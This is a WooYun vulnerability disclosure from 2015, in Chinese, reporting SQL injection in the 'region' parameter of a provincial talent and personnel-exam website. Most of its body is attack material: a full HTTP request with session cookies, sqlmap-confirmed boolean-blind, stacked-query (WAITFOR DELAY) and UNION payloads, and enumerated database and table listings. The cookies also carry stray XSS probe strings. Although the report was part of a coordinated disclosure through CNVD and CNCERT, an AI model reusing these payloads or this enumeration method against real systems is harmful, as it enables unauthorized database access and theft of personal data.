当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146518

漏洞标题:某省人事考试网存在SQL注入

相关厂商:江西人才网

漏洞作者: xunnun

提交时间:2015-10-13 21:53

修复时间:2015-11-30 14:36

公开时间:2015-11-30 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

RT

详细说明:

GET /bys/freeposlistmore_dxs.asp?pagesize=3&region=*&reqtxt=&tp=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: cacheid=E%3A%5Cwebroot%5Cjxrcw2008%5Ccachefile%5C20151012969%2Edbx; ASPSESSIONIDSADQRSDD=MNDGBIEBCDAIJOMFAOOOJNEO; once%5Fsea0=2015%2F10%2F12+11%3A38%3A34%5Bs%5Dduring%3D30%26; c%5Fcounts=0; once%5Fsea1=2015%2F10%2F12+11%3A38%3A39%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; dwid=; rcid=vid=b2b7ab2daf45bbf17f00b39b68c3dbf9&id=13480735; once%5Fsea2=2015%2F10%2F12+9%3A13%3A18%5Bs%5Dduring%3D30%26hr1%3D%2C362500%2C100000%26; ASP.NET_SessionId=ct5xohmgzk2aba555ozabg45; once%5Fsea3=2015%2F10%2F12+9%3A14%3A17%5Bs%5Dduring%3D1%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea4=2015%2F10%2F12+9%3A07%3A41%5Bs%5Dduring%3D30%26; once%5Fsea5=2015%2F10%2F12+9%3A14%3A54%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%D6%B0%CE%BB%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%26; once%5Fsea6=2015%2F10%2F12+9%3A07%3A53%5Bs%5Dduring%3D30%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea7=2015%2F10%2F12+9%3A07%3A59%5Bs%5Dduring%3D30%26; PHPSESSID=0f07c3754e2326b636e6bdd57f0f1cb3; once%5Fsea8=2015%2F10%2F12+11%3A38%3A31%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%E5%8E%A8%E5%B8%88%26; once%5Fsea9=2015%2F10%2F12+11%3A38%3A32%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; Hm_lvt_59597c781e785574f9f3b0ff29411bb0=1444620927,1444620934,1444620940,1444621125; Hm_lpvt_59597c781e785574f9f3b0ff29411bb0=1444621125; HMVT=59597c781e785574f9f3b0ff29411bb0|1444617322|; HMACCOUNT=A045F03F2DBCE2A0; bdshare_firstime=1444617386998; BAIDUID=530654A42E45A89ADE4A3F0A3C813510:FG=1; ASPSESSIONIDQADRSRCD=IAMPMGHBLPEGAJIAGDLGHDBC; a6859_pages=1; a6859_times=1; Hm_lvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lpvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; Hm_lpvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; ASPSESSIONIDQACTTSDC=BPCHFNCBKGPNGEAEOHAJFKCN; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; kf51_userid=1444618182085_8968; kf51_referrer=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; cck_lasttime=1444618182090; cck_count=0; jxrc_dw_autowidth=1; cnzz_a31557=0; sin31557=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; rtime=0; ltime=1444620194724; cnzz_eid=17005507-1304580828-http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%28; CNZZDATA31664=cnzz_eid%3D1282555937-1444615235-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1444615235
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


region参数存在注入

sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=%' AND 8995=8995 AND '%'='&reqtxt=&tp=2
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=%';WAITFOR DELAY '0:0:5'--&reqtxt=&tp=2
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=-9379%' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(97)+CHAR(69)+CHAR(109)+CHAR(119)+CHAR(66)+CHAR(117)+CHAR(118)+CHAR(113)+CHAR(81)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL-- &reqtxt=&tp=2
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] master
[*] model
[*] msdb
[*] newjxrc
[*] News
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Database: newjxrc
[10 tables]
+--------------+
| CD_INDU      |
| PosViewTimes |
| RC_INFO      |
| RESULT4DW    |
| RESULT4RC    |
| cd_educ      |
| groupPos     |
| indutj       |
| postptj      |
| wkregtj      |
+--------------+


Database: master
[359 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS              |
| INFORMATION_SCHEMA.COLUMNS                        |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE            |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES              |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE        |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE         |
| INFORMATION_SCHEMA.DOMAINS                        |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS             |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE               |
| INFORMATION_SCHEMA.PARAMETERS                     |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS        |
| INFORMATION_SCHEMA.ROUTINES                       |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS                |
| INFORMATION_SCHEMA.SCHEMATA                       |
| INFORMATION_SCHEMA.TABLES                         |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS              |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES               |
| INFORMATION_SCHEMA.VIEWS                          |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE              |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE               |
| spt_fallback_db                                   |
| spt_fallback_dev                                  |
| spt_fallback_usg                                  |
| spt_monitor                                       |
| spt_values                                        |
| sys.all_columns                                   |
| sys.all_objects                                   |
| sys.all_parameters                                |
| sys.all_sql_modules                               |
| sys.all_views                                     |
| sys.allocation_units                              |
| sys.assemblies                                    |
| sys.assembly_files                                |
| sys.assembly_modules                              |
| sys.assembly_references                           |
| sys.assembly_types                                |
| sys.asymmetric_keys                               |
| sys.backup_devices                                |
| sys.certificates                                  |
| sys.change_tracking_databases                     |
| sys.change_tracking_tables                        |
| sys.check_constraints                             |
| sys.column_type_usages                            |
| sys.column_xml_schema_collection_usages           |
| sys.columns                                       |
| **.**.**.**puted_columns                              |
| sys.configurations                                |
| sys.conversation_endpoints                        |
| sys.conversation_groups                           |
| sys.conversation_priorities                       |
| sys.credentials                                   |
| sys.crypt_properties                              |
| sys.cryptographic_providers                       |
| sys.data_spaces                                   |
| sys.database_audit_specification_details          |
| sys.database_audit_specifications                 |
| sys.database_files                                |
| sys.database_mirroring_endpoints                  |
| sys.database_mirroring_endpoints                  |
| sys.database_mirroring_witnesses                  |
| sys.database_permissions                          |
| sys.database_principal_aliases                    |
| sys.database_principals                           |
| sys.database_recovery_status                      |
| sys.database_role_members                         |
| sys.databases                                     |
| sys.default_constraints                           |
| sys.destination_data_spaces                       |
| sys.dm_audit_actions                              |
| sys.dm_audit_class_type_map                       |
| sys.dm_broker_activated_tasks                     |
| sys.dm_broker_connections                         |
| sys.dm_broker_forwarded_messages                  |
| sys.dm_broker_queue_monitors                      |
| sys.dm_cdc_errors                                 |
| sys.dm_cdc_log_scan_sessions                      |
| sys.dm_clr_appdomains                             |
| sys.dm_clr_loaded_assemblies                      |
| sys.dm_clr_properties                             |
| sys.dm_clr_tasks                                  |
| sys.dm_cryptographic_provider_properties          |


基本上读取数据无障碍,至此。

漏洞证明:

修复方案:

版权声明:转载请注明来源 xunnun@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-16 14:34

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无